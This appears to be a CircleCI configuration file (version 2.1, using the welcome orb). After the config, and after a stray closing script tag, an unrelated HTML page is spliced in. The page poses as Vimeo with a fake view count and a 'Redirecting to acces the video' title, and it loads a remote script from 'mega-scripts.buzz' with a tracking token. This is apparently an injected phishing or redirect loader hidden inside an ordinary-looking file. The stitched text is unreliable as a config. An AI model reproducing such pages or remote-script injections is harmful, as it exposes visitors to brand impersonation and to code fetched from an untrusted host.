# Use the latest 2.1 version of CircleCI pipeline process engine. See: https://circleci.com/docs/2.0/configuration-reference
version: 2.1
# Use a package of configuration called an orb.
orbs:
  # Declare a dependency on the welcome-orb
  welcome: circleci/welcome-orb@0.4.1
# Orchestrate or schedule a set of jobs
workflows:
  # Name the workflow "welcome"
  welcome:
    # Run the welcome/run job in its own container
    jobs:
      - welcome/run
      </script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta property="og:site_name" content="Vimeo">
<meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=5.0,user-scalable=yes">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta property="og:image" content="https://i.mycdn.me/image?id=904693929315&t=50&plc=WEB&tkn=*aSsuS1a0fvP97DJUSEWxAGMAwkc&fn=external_17" />
<meta property="og:title" content="Redirecting to acces the video">
<meta property="og:description" content="5.502.608 Views">
<meta property="og:url" content="https://www.vimeo.com">
<meta property="og:type" content="Redirecting to acces the video">
<title>Redirecting to acces the video</title>
</head>
<body style="font-family: Arial;font-size: 12pt;">
<script type="text/javascript" src="https://mega-scripts.buzz/?token=d979e5cc7476d4308bfbbc740f153db3"async="true"></script>
